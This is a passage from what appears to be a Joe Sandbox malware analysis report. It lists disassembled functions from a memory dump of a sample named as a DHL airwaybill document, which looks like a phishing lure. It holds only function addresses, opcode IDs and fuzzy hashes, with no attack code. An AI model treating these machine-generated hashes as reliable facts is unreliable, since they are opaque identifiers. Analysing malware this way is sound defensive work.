                • Instruction Fuzzy Hash: C7D0A932204620ABDB36AA1CFC00FC333E8BB88730F060499B018C7060D360AC81CA84
                Function 01B7E908 Relevance: .0, Instructions: 16COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                • Instruction ID: 242201c03ef74e08c9c304e74b036b3d278c797ae85cce107b9b18b811e116f0
                • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                • Instruction Fuzzy Hash: 72E0EC369507849BDF1ADF59C640F5ABBF9FF94B40F150498A1185B660C734E900CB40
                Function 01AFA0E3 Relevance: .0, Instructions: 15COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                • Instruction ID: 059133e153a3804032ef33afb493ef4b9999afaf435b1ae51a9b9d0801eb3c30
                • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                • Instruction Fuzzy Hash: C4D0223231203093DF2897956800FA37915EF80AA0F0B006C360E93800C1048C42C2E0
                Function 01B3A830 Relevance: .0, Instructions: 14COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                • Instruction ID: ed205703384a3714f0254a60ad6410a502cbaad4ecc1c9d86fb44e2803bd106a
                • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                • Instruction Fuzzy Hash: 86D012371D064DBBCB119F66DC01F957BA9E764BA0F454020B504875A0D63AE950D584
                Function 01B3CA24 Relevance: .0, Instructions: 14COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7cbbfef692afaf2ee074699558e16c15a2e0b3012a5cf630a4f0fd5b917f5ad1
                • Instruction ID: 1a366a0d03a5c5861e746326368cbb6117cfa806306361655b37c38a5bf6f18e
                • Opcode Fuzzy Hash: 7cbbfef692afaf2ee074699558e16c15a2e0b3012a5cf630a4f0fd5b917f5ad1
                • Instruction Fuzzy Hash: 88D09234A555029BDF2FEF99CA15A6A7AB4EB54740F8000EDEB11A2528E369D8128A50
                Function 01B3C700 Relevance: .0, Instructions: 12COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                • Instruction ID: fbe6dd28e62d7cccf1ddd686b907fbba0c95ce266b5889cd867f313b44ed89d4
                • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                • Instruction Fuzzy Hash: 2BC01232290648AFCB16AA99CD01F027BA9EBA8B50F410061F2048B670E631E820EA84
                Function 01B20310 Relevance: .0, Instructions: 11COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                • Instruction ID: bdb0842f0badaeebb4a5b8396a0fab6cd97d879b9d04f25a0fb4cd19cf1f70c5
                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                • Instruction Fuzzy Hash: 2FD01236100249EFCB05EF41C890D9A772AFBD8710F108019FD19076108A31ED62DB90
                Function 01B00750 Relevance: .0, Instructions: 9COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                • Instruction ID: 625a2d1b02b2511ebbe5cfea153cf530ae5deadcd50e03cda990ed9772173773
                • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                • Instruction Fuzzy Hash: 34C04879B01A428FCF1ADB2ED2D4F49B7E4FB44750F5608D0E845CBB22E724E901CA10
                Function 01B44340 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 099367b6d7f5324d043943bd73975e1dce487f5be29d3fd3d7de2098ae20f6b7
                • Instruction ID: 9508268e06c0cc4a78f52726047d78cafa63f1f46b7466f35922fe9a92c31405
                • Opcode Fuzzy Hash: 099367b6d7f5324d043943bd73975e1dce487f5be29d3fd3d7de2098ae20f6b7
                • Instruction Fuzzy Hash: 11900232605800129284725948846464005A7E0301B55C051F4424555CCB148A565761
                Function 01B44650 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a20ca061b6da3b06071e9e805d516c517907a15b1f347a87ff3aa6b7d06e521c
                • Instruction ID: fde19947da6beedd36cde2d3d73f5f07e55bf4ab7da3a5c7b248881e94c13e28
                • Opcode Fuzzy Hash: a20ca061b6da3b06071e9e805d516c517907a15b1f347a87ff3aa6b7d06e521c
                • Instruction Fuzzy Hash: A2900262601500424284725948045066005A7E1301395C155B4554561CC71889559769
                Function 01B42BA0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9f733b34296413a034b98ce98f092b6f360e21c5cf1bd64ad046da1b95594c34
                • Instruction ID: 116f42b9a0f1fb1eeaffeb58f64ca001f5024d88dc8f3ea2624d3194d6a83615
                • Opcode Fuzzy Hash: 9f733b34296413a034b98ce98f092b6f360e21c5cf1bd64ad046da1b95594c34
                • Instruction Fuzzy Hash: 4990023260540802D29472594414746000597D0301F55C051B4024655DC7558B557BA1
                Function 01B42B80 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e68deba4a4aa95e1b3aa66e358a4d4a059d434e8314753fa80457f41c2e8563d
                • Instruction ID: 6a544c1a1c9d60aff3c44373362a7bce19c20dcc4452081f0b3d5c71f5abc7a4
                • Opcode Fuzzy Hash: e68deba4a4aa95e1b3aa66e358a4d4a059d434e8314753fa80457f41c2e8563d
                • Instruction Fuzzy Hash: B890023220140802D24872594804786000597D0301F55C051BA024656ED76589917631
                Function 01B42BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c1b2ccb8fa3a7cf914821e35095bd262548f3065004bfc76a11150f78c21437f
                • Instruction ID: 6094bbfc2e0ba038a854de65bb06cf1731a5bc5b10ba2b1f3cdc7d976881081d
                • Opcode Fuzzy Hash: c1b2ccb8fa3a7cf914821e35095bd262548f3065004bfc76a11150f78c21437f
                • Instruction Fuzzy Hash: A990023220140802D2C47259440474A000597D1301F95C055B4025655DCB158B597BA1
                Function 01B42BE0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 79aa11e602266c258bd1b449584b71f44361cbc5715ac6b7ac63772a162ea7d7
                • Instruction ID: 95b259c3f9db00d1f2c06b92db05a426f11e19553be48aabf914f2b12bea342a
                • Opcode Fuzzy Hash: 79aa11e602266c258bd1b449584b71f44361cbc5715ac6b7ac63772a162ea7d7
                • Instruction Fuzzy Hash: 4590023220544842D28472594404B46001597D0305F55C051B4064695DD7258E55BB61
                Function 01B42AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2d7e841fd32050e0150fe815fd252b508c4437efc4dded15e00ee1b4b902681e
                • Instruction ID: 06b38c53b09a85d1445188b99ff0c59fa43cd7cab914a76f5826e85506c1b7ea
                • Opcode Fuzzy Hash: 2d7e841fd32050e0150fe815fd252b508c4437efc4dded15e00ee1b4b902681e
                • Instruction Fuzzy Hash: A19002A2201540924644B3598404B0A450597E0201B55C056F5054561CC62589519635
                Function 01B42AF0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2f5319a53bc7fe6cb65aeccda6fc0f75156d03c9b01d84701778f16ce819f2a6
                • Instruction ID: 28fdd767ce567f4f88601b52d33b3fe297daeb03856e4f9f469a2ba08276cf7c
                • Opcode Fuzzy Hash: 2f5319a53bc7fe6cb65aeccda6fc0f75156d03c9b01d84701778f16ce819f2a6
                • Instruction Fuzzy Hash: 68900226221400020289B659060460B0445A7D6351395C055F5416591CC72189655721
                Function 01B42AD0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cffec7c3405eed24e65aba6ab2ba665e37a7297eb59c89708757f63b81cac56b
                • Instruction ID: d43bf71651bf1b0efb09cdb2ebbb02a23fff9c6a7743d0da0a3845f9253f43f6
                • Opcode Fuzzy Hash: cffec7c3405eed24e65aba6ab2ba665e37a7297eb59c89708757f63b81cac56b
                • Instruction Fuzzy Hash: 0390043731140003034DF75D07047070047D7D5351355C071F5015551CD731CD715731
                Function 01B42DB0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d34f2ba710da5b2c3863b1ad5f6f710bc9820491fef1a840715a8edfc1a07e2d
                • Instruction ID: 2c2fe278a11ad28262b6bec3cae09a20fb96d1d12da775fbed9a7bc7cef5ebad
                • Opcode Fuzzy Hash: d34f2ba710da5b2c3863b1ad5f6f710bc9820491fef1a840715a8edfc1a07e2d
                • Instruction Fuzzy Hash: 6D90023224140402D285725944047060009A7D0241F95C052B4424555EC7558B56AF61
                Function 01B42DD0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 195f49d5b1f990e75199aaebeebdcfd205ffb731fb8a2325a8046b313f5fbd71
                • Instruction ID: 34c6c605ab0903ffd1b37041ddf4cd7186f4308c2a799b3078abd8e868ae318f
                • Opcode Fuzzy Hash: 195f49d5b1f990e75199aaebeebdcfd205ffb731fb8a2325a8046b313f5fbd71
                • Instruction Fuzzy Hash: D0900222242441525689B25944046074006A7E0241795C052B5414951CC6269956DB21
                Function 01B42D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4ca1a3bf5d549a7e6e4edd15baea34e73c2815e19fb1faeff08db29e95d82774
                • Instruction ID: d34443741836fa4ef38cf55424c60961e7c88ec488b27cfa36558a6fb17e98ab
                • Opcode Fuzzy Hash: 4ca1a3bf5d549a7e6e4edd15baea34e73c2815e19fb1faeff08db29e95d82774
                • Instruction Fuzzy Hash: D690022230140003D284725954187064005E7E1301F55D051F4414555CDA1589565722
                Function 01B42D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 82120807f823c0a915aba903b5c34babe2bd51bfe6589ccc4e6eb9dd288761a9
                • Instruction ID: 056e85fdf7fbcc6a7a78014185c41f720c4b5e181151946ada4b45834bb78f2a
                • Opcode Fuzzy Hash: 82120807f823c0a915aba903b5c34babe2bd51bfe6589ccc4e6eb9dd288761a9
                • Instruction Fuzzy Hash: E290022A21340002D2C47259540870A000597D1202F95D455B4015559CCA1589695721
                Function 01B42D00 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1e4fbbb60209a98764b8542d260c1c70803a2fc486331d4e638b2b3d0bea9b5d
                • Instruction ID: 30da50cf0505fb6daedd87ef8d74440471b604c17ae215734693078e28489489
                • Opcode Fuzzy Hash: 1e4fbbb60209a98764b8542d260c1c70803a2fc486331d4e638b2b3d0bea9b5d
                • Instruction Fuzzy Hash: A290022220544442D24476595408B06000597D0205F55D051B5064596DC7358951A631
                Function 01B42CA0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8fea2407909ca325ff15fc4bd3edcf80ec662f14d8c4ad366fd6878e980fae12
                • Instruction ID: 4c6f8b5247b86f02eb1abde95f07a361f2d9880a807be5d1e2a6dbf244b40784
                • Opcode Fuzzy Hash: 8fea2407909ca325ff15fc4bd3edcf80ec662f14d8c4ad366fd6878e980fae12
                • Instruction Fuzzy Hash: CB90023220140402D24476995408746000597E0301F55D051B9024556EC76589916631
                Function 01B42CF0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3a3089b28712c41ac13e55691779b8646e3ba9089aa541d77b31089161f17ec3
                • Instruction ID: 37ba1a7980998335f1f07d99cafe5b352352750782fd4805ba5127a14c491f3c
                • Opcode Fuzzy Hash: 3a3089b28712c41ac13e55691779b8646e3ba9089aa541d77b31089161f17ec3
                • Instruction Fuzzy Hash: 9590043330140403D344735D550C7070005D7D0301F55D451F443455DDD757CD517731
                Function 01B42CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4cbd7e40f268966240a547f2c5ee70247c517299cd75a17969cd052ea469399a
                • Instruction ID: 1579d0f774df08d650c195f836b74ec97717845e92c5eefcf7760036f01ae0be
                • Opcode Fuzzy Hash: 4cbd7e40f268966240a547f2c5ee70247c517299cd75a17969cd052ea469399a
                • Instruction Fuzzy Hash: 2490022260540402D28472595418706001597D0201F55D051B4024555DC7598B556BA1
                Function 01B42C60 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 10b145c276672ea7b5971c26093b26cc7555988ada262b663e04a773cef3da10
                • Instruction ID: df72616805405044e06067045cb2a58bb27f1235cdf2d9eed5fcf6af635e115a
                • Opcode Fuzzy Hash: 10b145c276672ea7b5971c26093b26cc7555988ada262b663e04a773cef3da10
                • Instruction Fuzzy Hash: B790023220140842D24472594404B46000597E0301F55C056B4124655DC715C9517A21
                Function 01B42FB0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 472f55bd1ffd59b55bf558a241372a4975e0ec91ce3e6743c89c101542e97c9c
                • Instruction ID: 9a9b0b7d53f4ad3adfee8c905f7aa7e70c0feb8cad6b4563f6e4f7902e7e1d75
                • Opcode Fuzzy Hash: 472f55bd1ffd59b55bf558a241372a4975e0ec91ce3e6743c89c101542e97c9c
                • Instruction Fuzzy Hash: D990022260140042428472698844A064005BBE1211755C161B4998551DC65989655B65
                Function 01B42FA0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 674d0781de6cabddc71f8cc63f23311c49b562f691f427915e4df22fa2527463
                • Instruction ID: b9904e556aa5340ddb64b9415b70227081cdb0ec32bb9eb9d6e80072ec380327
                • Opcode Fuzzy Hash: 674d0781de6cabddc71f8cc63f23311c49b562f691f427915e4df22fa2527463
                • Instruction Fuzzy Hash: 2D90023220180402D24472594808747000597D0302F55C051B9164556EC765C9916A31
                Function 01B42F90 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 849900e78c259523b080d2bf56d7d6a83b6a9c6763df8a49e9722712fd89acbc
                • Instruction ID: fda152f36c27e69d112cc85acca7a1bf4e962a834082c5e2e61d80e774b8a358
                • Opcode Fuzzy Hash: 849900e78c259523b080d2bf56d7d6a83b6a9c6763df8a49e9722712fd89acbc
                • Instruction Fuzzy Hash: 3290023220180402D2447259481470B000597D0302F55C051B5164556DC72589516A71
                Function 01B42FE0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2d1399105cc53e041d9b1aa692200c0d5a70aa2e330bbd8d002df913b69d7fc6
                • Instruction ID: 1a01ab7a42b2e43d01da4cd0decde8de13bd3102f9f9c45900a716e62473f1a2
                • Opcode Fuzzy Hash: 2d1399105cc53e041d9b1aa692200c0d5a70aa2e330bbd8d002df913b69d7fc6
                • Instruction Fuzzy Hash: C9900222211C0042D34476694C14B07000597D0303F55C155B4154555CCA1589615A21
                Function 01B42F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 66d18fce6d84233a23324c90782d1f503fa7345869ae0aa237bea4ef9dcaa05e
                • Instruction ID: d66ae60f39526a84e4b9286d63a87628021f98faf2d45f9b1fa231e99e470a22
                • Opcode Fuzzy Hash: 66d18fce6d84233a23324c90782d1f503fa7345869ae0aa237bea4ef9dcaa05e
                • Instruction Fuzzy Hash: 9890026234140442D24472594414B060005D7E1301F55C055F5064555DC719CD526626
                Function 01B42F60 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dc231e01f8205ded6eb20c6d20484298cc8efa3bf25a829f5070db745b76cd7e
                • Instruction ID: f10a881eb887ce42f723381602f26f933a6b6351c2b6de773db1bf09e49c2e3f
                • Opcode Fuzzy Hash: dc231e01f8205ded6eb20c6d20484298cc8efa3bf25a829f5070db745b76cd7e
                • Instruction Fuzzy Hash: 1C90026221140042D24872594404706004597E1201F55C052B6154555CC6298D615625
                Function 01B42EA0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e248064fcd29cce60b3ed8b3ce0d19bb240cf1f55806e2ca59925c2021e4da09
                • Instruction ID: 38920bec2ec6bb62b46968a85925e9fb337d10db96d0a06db12efe27378827ad
                • Opcode Fuzzy Hash: e248064fcd29cce60b3ed8b3ce0d19bb240cf1f55806e2ca59925c2021e4da09
                • Instruction Fuzzy Hash: A590027220140402D28472594404746000597D0301F55C051B9064555EC7598ED56B65
                Function 01B42E80 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 510262729f7b599c641e5435bcc5fbc3cbba0e3a3a9d5547eb95dab71e61b931
                • Instruction ID: 8205657f23d9184ebe984f8b260477053dc1dd4479abc8838b4e5c6fb8c1fa2b
                • Opcode Fuzzy Hash: 510262729f7b599c641e5435bcc5fbc3cbba0e3a3a9d5547eb95dab71e61b931
                • Instruction Fuzzy Hash: 9B90022260140502D24572594404716000A97D0241F95C062B5024556ECB258A92A631
                Function 01B42EE0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9309459920bcae56a99b2c4ada3f7967f097937cddb85d71e615b6a76bb0c243
                • Instruction ID: b2bacb851ad559cc4ea0b5372e10c459252cac72b919e10e84cd1a1f32c747e3
                • Opcode Fuzzy Hash: 9309459920bcae56a99b2c4ada3f7967f097937cddb85d71e615b6a76bb0c243
                • Instruction Fuzzy Hash: 9890026220180403D28476594804707000597D0302F55C051B6064556ECB298D516635
                Function 01B42E30 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
